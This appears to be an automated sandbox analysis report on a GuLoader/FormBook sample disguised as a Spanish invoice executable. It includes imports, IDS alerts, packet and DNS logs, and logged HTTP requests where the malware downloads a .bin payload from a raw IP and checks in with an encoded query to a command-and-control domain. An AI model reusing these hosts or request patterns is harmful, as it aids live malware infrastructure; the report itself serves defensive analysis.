                                                USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                Language of compilation system | Country where language is spoken
                                                English | United States
                                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                2025-01-15T18:20:23.968838+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49762 | 212.162.149.165 | 80 | TCP
                                                2025-01-15T18:20:58.019349+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49763 | 67.223.117.189 | 80 | TCP
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Jan 15, 2025 18:20:24.538717031 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.538721085 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.538834095 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.538892031 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.538938999 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.538986921 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539077044 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539138079 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.539272070 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.539272070 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.539326906 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539386034 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539431095 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539575100 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539589882 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.539635897 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.539710045 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539772987 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.539798975 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539910078 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.539942980 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.539987087 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540029049 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.540096045 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540142059 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.540267944 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.540278912 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540326118 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540374041 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.540429115 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540487051 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.540611982 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540616035 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.540687084 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540724039 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.540780067 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540858984 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.540932894 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.540966034 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541027069 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.541085958 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541127920 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.541174889 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541271925 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.541306019 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541348934 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.541425943 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541466951 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.541534901 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541647911 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.541656971 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541698933 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.541764021 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541802883 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.541898966 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.541985035 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.542007923 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542059898 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.542128086 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542151928 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.542273045 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542284012 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.542355061 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542438030 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.542486906 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542593956 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.542593956 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542671919 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.542706966 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542752028 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.542814970 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542943001 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.542957067 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.543004990 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.543066025 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.543102980 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.543169022 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.543217897 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.543359995 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.546758890 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.546926022 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.547100067 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.547158003 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.547271967 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.547314882 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.547388077 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.547468901 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.677697897 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.677757025 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.677834988 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.677913904 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.677978992 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.678062916 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.678072929 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.678122044 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.678169012 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.678267002 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.678309917 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.678329945 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.678375006 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.678482056 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.678539991 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.678544998 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.678590059 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.678800106 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.678801060 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.678890944 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.678981066 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679039001 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679148912 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679151058 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.679152012 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.679256916 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679306030 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.679348946 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.679372072 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679418087 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679512978 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.679512978 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.679651976 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.679701090 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679760933 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679805040 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679915905 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.679917097 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.679917097 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680027962 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.680069923 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680135965 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.680176020 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680219889 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680305958 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.680337906 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680356026 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.680474043 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.680509090 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680577993 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680588961 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.680677891 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680701971 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.680809975 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.680829048 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680872917 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.680990934 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681020975 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681080103 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681190014 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681229115 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681229115 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681276083 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681348085 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681413889 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681508064 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681528091 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681581974 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681637049 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681690931 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681755066 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681844950 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681869030 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.681934118 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.681982040 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682024002 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.682120085 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682177067 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.682235003 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682266951 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.682322979 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682384014 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.682452917 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682527065 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.682562113 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682607889 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.682679892 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682698011 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.682796001 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682878971 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.682921886 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.682944059 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683036089 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.683060884 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683176994 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.683216095 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683269024 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.683320045 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683391094 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.683410883 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683506966 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.683553934 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683619976 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.683645964 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683734894 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.683764935 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683876991 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.683960915 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.683967113 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684036970 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.684089899 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684113979 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.684205055 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684298038 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.684324026 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684360027 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.684437037 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684463978 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.684572935 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684585094 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.684695959 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684711933 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.684779882 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684907913 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.684932947 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685041904 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685051918 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685153008 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685269117 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685273886 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685348988 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685375929 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685426950 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685496092 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685599089 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685605049 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685651064 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685723066 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685767889 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685832024 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685936928 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.685959101 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685986042 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686074972 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686108112 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686237097 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686270952 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686322927 CET8049762212.162.149.165192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 15, 2025 18:20:47.275878906 CET | 56317 | 53 | 192.168.11.20 | 1.1.1.1
Jan 15, 2025 18:20:47.387069941 CET | 53 | 56317 | 1.1.1.1 | 192.168.11.20
Jan 15, 2025 18:20:52.391047001 CET | 53278 | 53 | 192.168.11.20 | 1.1.1.1
Jan 15, 2025 18:20:52.494688988 CET | 53 | 53278 | 1.1.1.1 | 192.168.11.20
Jan 15, 2025 18:20:57.499398947 CET | 63304 | 53 | 192.168.11.20 | 1.1.1.1
Jan 15, 2025 18:20:57.664299965 CET | 53 | 63304 | 1.1.1.1 | 192.168.11.20

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 15, 2025 18:20:47.275878906 CET | 192.168.11.20 | 1.1.1.1 | 0x9b84 | Standard query (0) | www.fullhdfilmizlesene.uno | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:20:52.391047001 CET | 192.168.11.20 | 1.1.1.1 | 0xabcf | Standard query (0) | www.brunokito.cloud | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:20:57.499398947 CET | 192.168.11.20 | 1.1.1.1 | 0xa900 | Standard query (0) | www.flourishno.life | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 15, 2025 18:20:47.387069941 CET | 1.1.1.1 | 192.168.11.20 | 0x9b84 | Name error (3) | www.fullhdfilmizlesene.uno | none | none | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:20:52.494688988 CET | 1.1.1.1 | 192.168.11.20 | 0xabcf | Name error (3) | www.brunokito.cloud | none | none | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:20:57.664299965 CET | 1.1.1.1 | 192.168.11.20 | 0xa900 | No error (0) | www.flourishno.life |  | 67.223.117.189 | A (IP address) | IN (0x0001) | false
                                                • 212.162.149.165
                                                • www.flourishno.life
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49762 | 212.162.149.165 | 80 | 1600 | C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:20:23.826337099 CET | 178 | OUT | GET /psKGLMYRljeu25.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: 212.162.149.165
Cache-Control: no-cache
Jan 15, 2025 18:20:23.968616009 CET | 1289 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 15 Jan 2025 05:47:22 GMT
Accept-Ranges: bytes
ETag: "bdc2a2f21067db1:0"
Server: Microsoft-IIS/8.5
Date: Wed, 15 Jan 2025 17:20:23 GMT
Content-Length: 287808


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49763 | 67.223.117.189 | 80 | 6480 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:20:57.837353945 CET | 512 | OUT | GET /qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9 HTTP/1.1
Host: www.flourishno.life
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Jan 15, 2025 18:20:58.019005060 CET | 1289 | IN | HTTP/1.1 404 Not Found
Date: Wed, 15 Jan 2025 17:20:57 GMT
Server: Apache
Content-Length: 32106
Connection: close
Content-Type: text/html; charset=utf-8


Target ID: 0
Start time: 12:18:24
Start date: 15/01/2025
Path: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
Imagebase: 0x400000
File size: 578'322 bytes
MD5 hash: 66D651E5546DEDAFD0A252400B70C21D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.84200771924.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000003.83100054536.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.84200771924.0000000008C45000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 12:20:14
Start date: 15/01/2025
Path: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
Imagebase: 0x400000
File size: 578'322 bytes
MD5 hash: 66D651E5546DEDAFD0A252400B70C21D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.84398186443.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                Target ID:3
                                                Start time:12:20:27
                                                Start date:15/01/2025
                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                Imagebase:0x140000000
                                                File size:16'696'840 bytes
                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:4
                                                Start time:12:20:28
                                                Start date:15/01/2025
                                                Path:C:\Windows\SysWOW64\rasphone.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\rasphone.exe"
